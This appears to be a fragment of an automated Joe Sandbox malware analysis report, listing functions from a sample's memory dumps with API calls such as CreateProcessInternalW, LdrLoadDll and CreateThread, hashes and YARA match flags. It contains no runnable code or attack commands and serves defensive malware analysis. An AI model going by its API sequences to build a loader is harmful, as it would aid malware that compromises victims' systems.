                              • Instruction ID: 3dc6f448cae05470a4513c790f0234bdd7767cd2cef78344ce73685f8cbe0370
                              • Opcode Fuzzy Hash: d31f0d206b5fd59311fc0ec3a4b9daedf519ad9713344ac155aab7d0ade2a516
                              • Instruction Fuzzy Hash: EA900231641400424581B1A98A459074005ABE1211765D125A0998550D855A89669665
                              Function 02EB2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 52d1788dc50d461fb9ea379b46477d7169f4c32553dfd19dc69eb2f478fa5966
                              • Instruction ID: 9d8e56879b9c8961a2b8b2c3d77353c559c5b7199a3dde5abe6d8d6c46ba019b
                              • Opcode Fuzzy Hash: 52d1788dc50d461fb9ea379b46477d7169f4c32553dfd19dc69eb2f478fa5966
                              • Instruction Fuzzy Hash: 0590027138140442D541B1994615B070005C7E1301F65D019E1064554D861ACD53A126
                              Function 02EB2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 0dadb3a3f5bc8db7d085ae42b523b69f6b2aad10aeb12af1a18128bd812fc4b3
                              • Instruction ID: 822d0969fee667f678567e9e2f20b27d885eeb24dce68ff470b0550aaf5e7cec
                              • Opcode Fuzzy Hash: 0dadb3a3f5bc8db7d085ae42b523b69f6b2aad10aeb12af1a18128bd812fc4b3
                              • Instruction Fuzzy Hash: 5390023124140402D541B5D95609647000587E0301F65E015A5024555EC6668992A131
                              Function 02EB2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: d6ba16a6303d04d2bd313e2bce2924607ec9736700282c71b2d96aa1217c0da8
                              • Instruction ID: 52a0e6c35ca16f53983add453275bf3db4109b8b0780019d1658eaf2819885bf
                              • Opcode Fuzzy Hash: d6ba16a6303d04d2bd313e2bce2924607ec9736700282c71b2d96aa1217c0da8
                              • Instruction Fuzzy Hash: C090023124140842D541B1994605B47000587E0301F65D01AA0124654D8616C952B521
                              Function 02EB2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 577f2c29fe9dae73c7f284dd509ef13a686b28c9c88bc3c2f019c8c556ebd3ea
                              • Instruction ID: 084b39ec6ceb043534faec2f6020ab5ee9da1e88b58ab43e2fae985d0a4fc4f2
                              • Opcode Fuzzy Hash: 577f2c29fe9dae73c7f284dd509ef13a686b28c9c88bc3c2f019c8c556ebd3ea
                              • Instruction Fuzzy Hash: EC90023124148802D551B199860574B000587D0301F69D415A4424658D86968992B121
                              Function 02EB2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 78887ef7f50ef92e7f0457c472f814ff9e962d119076f8c6f6b4d2af28207b57
                              • Instruction ID: 1f89afeaac7893d09a29f13a5810d3155fb8c4c7dd6886e1f67766ef0a2389f0
                              • Opcode Fuzzy Hash: 78887ef7f50ef92e7f0457c472f814ff9e962d119076f8c6f6b4d2af28207b57
                              • Instruction Fuzzy Hash: F590023124140413D552B1994705707000987D0241FA5D416A0424558D96578A53E121
                              Function 02EB2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 9a2b94d1ccad75a7eecf358eb2ded32f79cf1b4c2a078d9ff5fef1ac55dd288f
                              • Instruction ID: 4629551d504570b6c47dd78f6ea93ab4fc1258af415f24cd3d622bea78f5f840
                              • Opcode Fuzzy Hash: 9a2b94d1ccad75a7eecf358eb2ded32f79cf1b4c2a078d9ff5fef1ac55dd288f
                              • Instruction Fuzzy Hash: 85900231282441525986F1994605507400697E02417A5D016A1414950C85279957D621
                              Function 02EB2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: dc5a62672de78046ade18d6b44633d4242f980ef29353678d523fcf59df1791a
                              • Instruction ID: d76a4c6a9a24cda58f9f5e5eb07a9ae2b7e63a8cf7b977ac6b6d96f975078ce8
                              • Opcode Fuzzy Hash: dc5a62672de78046ade18d6b44633d4242f980ef29353678d523fcf59df1791a
                              • Instruction Fuzzy Hash: C290023134140003D581B19956196074005D7E1301F65E015E0414554CD91689579222
                              Function 02EB2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 1cbc210786e95c0e93518d6fccc887ca1111c5ea3d4d2f2603cc03e68fe04b29
                              • Instruction ID: 50e48605695abcea60aaeb60c1768fe663f1bdbf32b0be1223def4b921071ae8
                              • Opcode Fuzzy Hash: 1cbc210786e95c0e93518d6fccc887ca1111c5ea3d4d2f2603cc03e68fe04b29
                              • Instruction Fuzzy Hash: 6E90023925340002D5C1B199560960B000587D1202FA5E419A0015558CC916896A9321
                              Function 02EB35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 799e2efd479f7cdf7bbad65aa02fc3fa8694172b470c3744f1214204dc197122
                              • Instruction ID: a5eb21d4a14ac722d87218827d63ed77a91b93bb0d12f4988497477ad0cb7687
                              • Opcode Fuzzy Hash: 799e2efd479f7cdf7bbad65aa02fc3fa8694172b470c3744f1214204dc197122
                              • Instruction Fuzzy Hash: E290023164550402D541B1994715707100587D0201F75D415A0424568D87968A52A5A2
                              Function 02EB39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 64083c4c9e30d830ae8660a8c1ff6c2457d0af8119b8b84f79a0641858d80d01
                              • Instruction ID: 08d45ad1a328f1eabf9218ab4d9f03d40a23810d0198f87d0955891b6bf22697
                              • Opcode Fuzzy Hash: 64083c4c9e30d830ae8660a8c1ff6c2457d0af8119b8b84f79a0641858d80d01
                              • Instruction Fuzzy Hash: C690023128545102D591B19D46056174005A7E0201F65D025A0814594D85568956A221
                              Function 004B07D9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 498 4b07d9-4b084a call 4c9d20 call 4ca730 call 4b41e0 call 4a1410 call 4c1050 510 4b086a-4b0870 498->510 511 4b084c-4b085b PostThreadMessageW 498->511 511->510 512 4b085d-4b0867 511->512 512->510
                              APIs
                              • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 004B0857
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4a0000_replace.jbxd
                              Yara matches
                              Similarity
                              • API ID: MessagePostThread
                              • String ID: C3vB7APK$C3vB7APK
                              • API String ID: 1836367815-224894077
                              • Opcode ID: 593df905b1c757dd64ac2f9291ac97c20b7ce8777e7959efd72ea3ba965eb9a5
                              • Instruction ID: 6a6509f0bfe5b1f081748c25eb58801fda5564413624060ae7fcad7395725c7d
                              • Opcode Fuzzy Hash: 593df905b1c757dd64ac2f9291ac97c20b7ce8777e7959efd72ea3ba965eb9a5
                              • Instruction Fuzzy Hash: FD114876C0010C7AEB10A6E58C82EEFBB7CDF417A8F058069FA1467142D5285F068BF5
                              Function 004B07E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 513 4b07e0-4b084a call 4c9d20 call 4ca730 call 4b41e0 call 4a1410 call 4c1050 524 4b086a-4b0870 513->524 525 4b084c-4b085b PostThreadMessageW 513->525 525->524 526 4b085d-4b0867 525->526 526->524
                              APIs
                              • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 004B0857
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4a0000_replace.jbxd
                              Yara matches
                              Similarity
                              • API ID: MessagePostThread
                              • String ID: C3vB7APK$C3vB7APK
                              • API String ID: 1836367815-224894077
                              • Opcode ID: a40b98627cc5d50ece7de107a187b26deb4a606919741b6c6815a407136a656e
                              • Instruction ID: 4581d5664f3604c8086369f1ec482acddd1dd89f665470faea6532ee54cd16ff
                              • Opcode Fuzzy Hash: a40b98627cc5d50ece7de107a187b26deb4a606919741b6c6815a407136a656e
                              • Instruction Fuzzy Hash: E901D675D0111C7AEB10A6E68C82EEFBB7CDF41798F058069F914A7141D52C5F068BF5
                              Function 004C2930 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                              Download Yara Rule
                              APIs
                              • Sleep.KERNELBASE(000007D0), ref: 004C29FB
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4a0000_replace.jbxd
                              Yara matches
                              Similarity
                              • API ID: Sleep
                              • String ID: net.dll$wininet.dll
                              • API String ID: 3472027048-1269752229
                              • Opcode ID: 1360570367d0fb7b8bef5d449e7c85faee9084af8dc4cac859314d46852b89ac
                              • Instruction ID: ea18d6aa5e684fac34ef30a75df41c5660d318b5374db407c330b4815935dd13
                              • Opcode Fuzzy Hash: 1360570367d0fb7b8bef5d449e7c85faee9084af8dc4cac859314d46852b89ac
                              • Instruction Fuzzy Hash: EB31BEB5601704BBC724DF65C885FE7BBA8EB88704F00451EF91E5B241D7B8BA448BA8
                              Function 004B78BD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNELBASE(00008003,?,?,004B16F0,gkL,004C4447,?), ref: 004B7953
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4a0000_replace.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorMode
                              • String ID: GDL
                              • API String ID: 2340568224-1642841581
                              • Opcode ID: 3efa460b69caa97a9ae5123914c5a9449afb5e3ce6b9a6294e9f1d36124eb74a
                              • Instruction ID: 38027e8a7d03bdd6e50c94b995b185f3ac365900034a726147172184d5c19c2b
                              • Opcode Fuzzy Hash: 3efa460b69caa97a9ae5123914c5a9449afb5e3ce6b9a6294e9f1d36124eb74a
                              • Instruction Fuzzy Hash: D8F0F071918208BBFB04EBB49C42FDE7768DB40310F10836EF808DB2C0E63DE64096A9
                              Function 004C80C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(004B13F9,?,004C4917,004B13F9,004C4447,004C4917,?,004B13F9,004C4447,00001000,?,?,004C997D), ref: 004C80FF
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4a0000_replace.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap
                              • String ID: GDL
                              • API String ID: 1279760036-1642841581
                              • Opcode ID: c15f31648256afec11c07387016be4a71b7fec114b3f184dd39e37366af0fbf5
                              • Instruction ID: 2003480a5c46e3b2bbbdaa3042ede49d3067ed28d3d3fabfbeb6d07b64c7735f
                              • Opcode Fuzzy Hash: c15f31648256afec11c07387016be4a71b7fec114b3f184dd39e37366af0fbf5
                              • Instruction Fuzzy Hash: 47E06D756002087FD614EE99DC41FAB37ACEF89714F00401DF908A7242C670B81087B9
                              Function 004B7920 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNELBASE(00008003,?,?,004B16F0,gkL,004C4447,?), ref: 004B7953
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4a0000_replace.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorMode
                              • String ID: GDL
                              • API String ID: 2340568224-1642841581
                              • Opcode ID: 5f2835592c33483a3209c854186819b959893caa7e4f4cae01b3d752b9690ab4
                              • Instruction ID: 38e9b1b8712c948f8545f3c7c800ed0866d0e96682f6c66f478275c80104fbf2
                              • Opcode Fuzzy Hash: 5f2835592c33483a3209c854186819b959893caa7e4f4cae01b3d752b9690ab4
                              • Instruction Fuzzy Hash: E6D05EB57883043BF740A6FA8C07F5A368C4B45754F054069BA4DEB2D3E96AF44085BD
                              Function 004BE9A5 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 105COMMON
                              Download Yara Rule
                              APIs
                              • CoInitialize.OLE32(00000000), ref: 004BE9C7
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4a0000_replace.jbxd
                              Yara matches
                              Similarity
                              • API ID: Initialize
                              • String ID: @J7<
                              • API String ID: 2538663250-2016760708
                              • Opcode ID: 5886bda2ea2a909f0e33f50c299a636c25a0c79ad67532fc40765d33b76a55d5
                              • Instruction ID: 25ca55efa08e1140430f5b2a7f6e61604a923d194278bd8cd0afa1a3c81f3e48
                              • Opcode Fuzzy Hash: 5886bda2ea2a909f0e33f50c299a636c25a0c79ad67532fc40765d33b76a55d5
                              • Instruction Fuzzy Hash: BE313076A0020AAFDB00DFD9D8809EFB7B9BF88304B108559E516AB214D775AE05CBA1
                              Function 004BE9B0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                              Download Yara Rule
                              APIs
                              • CoInitialize.OLE32(00000000), ref: 004BE9C7
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4a0000_replace.jbxd
                              Yara matches
                              Similarity
                              • API ID: Initialize
                              • String ID: @J7<
                              • API String ID: 2538663250-2016760708
                              • Opcode ID: 7c9df6cb28961e964fc0c93e41cf5082c95b158057a8b503456816a7470198de
                              • Instruction ID: 69f1ce4f806b4096687147eca62f4f2f08e101093685adf6d312b75962face99
                              • Opcode Fuzzy Hash: 7c9df6cb28961e964fc0c93e41cf5082c95b158057a8b503456816a7470198de
                              • Instruction Fuzzy Hash: 57313EB5A0020AAFDB00DFD9D880DEFB7B9BF88304B108559E506EB214D775EE05CBA4
                              Function 004B41E0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004B4252
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4a0000_replace.jbxd
                              Yara matches
                              Similarity
                              • API ID: Load
                              • String ID:
                              • API String ID: 2234796835-0
                              • Opcode ID: 4942236bfcc2cdc72c15d00e4ef94c83d2c3bb9375bfc3a910db54f145811991
                              • Instruction ID: bf2a52f486284b6d8e0d3aa447802fcf320a79da1276a290e19a9c3592fc4d93
                              • Opcode Fuzzy Hash: 4942236bfcc2cdc72c15d00e4ef94c83d2c3bb9375bfc3a910db54f145811991
                              • Instruction Fuzzy Hash: 190152B9D4010DABDF14DAE1DC42FDEB3789B54308F004199F91897241F635EB14CB95
                              Function 004C81A0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,004B7AD3,00000010,?,?,?,00000044,?,00000010,004B7AD3,?,?,?), ref: 004C8203
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4a0000_replace.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateInternalProcess
                              • String ID:
                              • API String ID: 2186235152-0
                              • Opcode ID: b6abc40920fd18004f57404b2121e80bf88f2d8e1aaa096e59434a1a51c70b46
                              • Instruction ID: ecf38451d26b5d92b42ad3dcf96b31648b0da48e8ef15d8926f7d88923f9296b
                              • Opcode Fuzzy Hash: b6abc40920fd18004f57404b2121e80bf88f2d8e1aaa096e59434a1a51c70b46
                              • Instruction Fuzzy Hash: 5A01C0B2201108BFCB44DE89DC81EEB77ADEF8C754F40820DBA09E3241D630F8518BA8
                              Function 004A9400 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                              Download Yara Rule
                              APIs
                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 004A9445
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4a0000_replace.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateThread
                              • String ID:
                              • API String ID: 2422867632-0
                              • Opcode ID: 7f12d6052917dccba4093190ea7765fcfc7183e6a79559a72e25c45ff0a3fb46
                              • Instruction ID: dd16142ad4ba7895ce0e16fa1ab4aaf6f3eb2314473eda20b484fcd2fb54862f
                              • Opcode Fuzzy Hash: 7f12d6052917dccba4093190ea7765fcfc7183e6a79559a72e25c45ff0a3fb46
                              • Instruction Fuzzy Hash: 4DF0E53738420436E22061AA9C03FDB774CCB86764F14002EF70DEB1C0D99AB80142EC
                              Function 004A93FD Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                              Download Yara Rule
                              APIs
                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 004A9445
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4a0000_replace.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateThread
                              • String ID:
                              • API String ID: 2422867632-0
                              • Opcode ID: 291186dbf43c1889cbb39f886cc81fe7bbe88c09fe59ae057517738384ec3b9a
                              • Instruction ID: 550a858b1ce6ecfd6e0b6d9d5a551559023d68a23d30ce081fa84807e64b62ee
                              • Opcode Fuzzy Hash: 291186dbf43c1889cbb39f886cc81fe7bbe88c09fe59ae057517738384ec3b9a
                              • Instruction Fuzzy Hash: CDF0657668060076E27062A98C03FDB675CDB96764F14001EF71DAB1D1C99A784186AC
                              Function 004C8110 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,CA62C1D6,00000007,00000000,00000004,00000000,004B3ABA,000000F4,?,?,?,?,?), ref: 004C814C
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4a0000_replace.jbxd
                              Yara matches
                              Similarity
                              • API ID: FreeHeap
                              • String ID:
                              • API String ID: 3298025750-0
                              • Opcode ID: 2b7317538ed2ab562b82a06e89bfc92f051dd752748b3b0b0d86a77d6e43a305
                              • Instruction ID: aa6373459b826e692bdd8338d2d863fba632ed9f082998d96aaa51a656a3f6ae
                              • Opcode Fuzzy Hash: 2b7317538ed2ab562b82a06e89bfc92f051dd752748b3b0b0d86a77d6e43a305
                              • Instruction Fuzzy Hash: DEE065B6600208BFD610EE99DC41FAB37ACEF8A754F40401EF909A7242C670B8108BB9
                              Function 004B7B10 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              • GetFileAttributesW.KERNELBASE(?), ref: 004B7B3C
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4a0000_replace.jbxd
                              Yara matches
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 17b7fe2669b1969da13cdbc655328eb03617f76aa479ff3bdd72938b73c92513
                              • Instruction ID: b4ce720d6c38575e2cee10aebfbdf7898c331a6d644111b451d4f8b71291ab53
                              • Opcode Fuzzy Hash: 17b7fe2669b1969da13cdbc655328eb03617f76aa479ff3bdd72938b73c92513
                              • Instruction Fuzzy Hash: 8BE020752882041BF720697CDC45FA7334CC784728F140555BA1DCB3C1D53DF9414568
                              Function 02EB2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 925a99cff251ef6cb1d5ebf318f83557e5f40ef0fae0ca9111a15c84abfe778e
                              • Instruction ID: 4dfe8b5fd751a6b4b2406485db54964088b8fd6cbc8bd6d1d3194c9e2c9db880
                              • Opcode Fuzzy Hash: 925a99cff251ef6cb1d5ebf318f83557e5f40ef0fae0ca9111a15c84abfe778e
                              • Instruction Fuzzy Hash: FDB09B719415C5C5DE52E7604B097577A006FD0706F25D075D3030641E4739C5D1F575

                              Non-executed Functions

